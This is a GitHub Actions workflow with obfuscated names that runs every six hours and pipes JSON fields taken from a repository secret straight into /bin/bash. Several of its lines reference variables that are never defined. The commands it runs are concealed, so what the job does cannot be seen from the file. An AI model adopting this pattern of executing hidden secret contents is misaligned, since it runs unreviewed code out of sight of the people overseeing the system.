name: caocao19870106

on:
  workflow_dispatch:
  schedule:
    - cron: '17 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870106
        env:
          abju2: ${{ secrets.abju2 }}
        run: |
          echo $abju2 | jq -r .wff020 | /bin/bash
          echo $j135 | jq -r .duta208 | /bin/bash
          echo $kkr61 | jq -r .yf0807 | /bin/bash
          echo $aoj860 | jq -r .nago46075 | /bin/bash
          echo $lsbe04 | jq -r .rbi96320 | /bin/bash
          echo $hmsiu4 | jq -r .dj80 | /bin/bash

